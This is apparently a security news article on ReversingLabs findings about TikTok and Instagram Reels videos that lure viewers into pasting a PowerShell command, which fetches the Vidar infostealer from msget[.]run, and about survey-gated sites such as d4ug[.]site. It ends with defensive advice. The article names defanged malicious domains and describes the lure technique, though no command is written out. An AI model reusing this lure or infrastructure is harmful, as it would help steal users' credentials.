"The more reports, the more likely it is that the accounts are taken down, which does slow down the momentum of these attackers," ReversingLabs wrote.
How TikTok and Instagram Reels were used to sell free software
Threat actors have been using short-form videos on TikTok and Instagram Reels to push the Vidar infostealer, disguising the attacks as tutorials that promise to unlock premium software for free, according to new analysis from ReversingLabs. The firm described two separate campaigns that manipulated platform recommendation algorithms to reach large audiences and funnel viewers to sites that peddle fake free software such as Spotify Premium.
The Vidar infostealer and the msget[.]run delivery
Vidar is described as a long-running infostealer sold as a service for a $300 lifetime license; it harvests credentials, financial data and authentication tokens. ReversingLabs reported that a refresh last October made the malware "stealthier." In the first campaign, near-identical accounts with names like "windows.tips" and a blue-and-white crown icon that aped an official Windows profile posted an AI-voiced clip that walked viewers through opening PowerShell and pasting a command.
That PowerShell command silently downloaded and ran a script from a lookalike domain, msget[.]run, a domain some mistook for a Microsoft address. The file pulled down by the script was Vidar, ReversingLabs found. The clips gained measurable traction: one tutorial exceeded 100,000 views, and to climb the algorithm the accounts chased saves and shares rather than likes—an approach reflected in one video logging nearly 1,700 saves alongside its six-figure view count.
Curiosity-bait comments, survey gates and d4ug[.]site
The second campaign looked less polished, the firm said. Ordinary-looking accounts posted music-backed clips that flaunted free Spotify Premium, then baited comments—sometimes asking viewers to reply with a word like "ok" to trigger a direct message with instructions. Those instructions pointed to sites such as d4ug[.]site that promised free games and AI tools but gated the download behind survey-after-survey.
ReversingLabs was unable to get past the surveys, so the final payload for the second campaign remained unconfirmed. The technique of using comment bait and gated sites is sticky: creators can delete warning comments, and ReversingLabs reported that its attempts to report posts to Instagram were rejected.
ReversingLabs' recommendations and practical defenses
To defend against this threat, ReversingLabs urged organizations to take concrete steps: audit who holds software-install privileges and what they are installing; refresh phishing training to cover social feeds as well as email and text; and encourage staff to report suspicious posts, even on personal accounts. ReversingLabs emphasized reporting as a practical mitigation: "The more reports, the more likely it is that the accounts are taken down, which does slow down the momentum of these attackers," the company wrote.
What this means for technologists, procurement leaders, and end users
- Technologists and security teams: Review and tighten who can install software and monitor for unusual PowerShell usage originating from user devices, particularly scripts that call out to domains that mimic legitimate vendors.
- Procurement leaders and IT managers: Reassess privilege and installation policies and incorporate guidance on social-media-driven supply tangles—sites offering "free" premium software may gate downloads behind survey funnels that can hide malicious payloads.
- End users and employees: Treat social-media tutorials with the same skepticism as suspicious emails; do not paste PowerShell commands from short videos, and report posts that promise paid services for free.
ReversingLabs' analysis shows a bifurcated campaign: one tidy pipeline that delivered Vidar via a PowerShell command pointing at msget[.]run, and a second, more ad hoc pipeline that relied on comment bait and survey-gated sites such as d4ug[.]site—the latter's final payload left unconfirmed. The mix of algorithm gaming, lookalike domains and human curiosity made the campaign effective and difficult to police; for now, the firm concludes that vigilance and reporting are immediate, actionable defenses that can blunt attackers' momentum.
Full report: https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
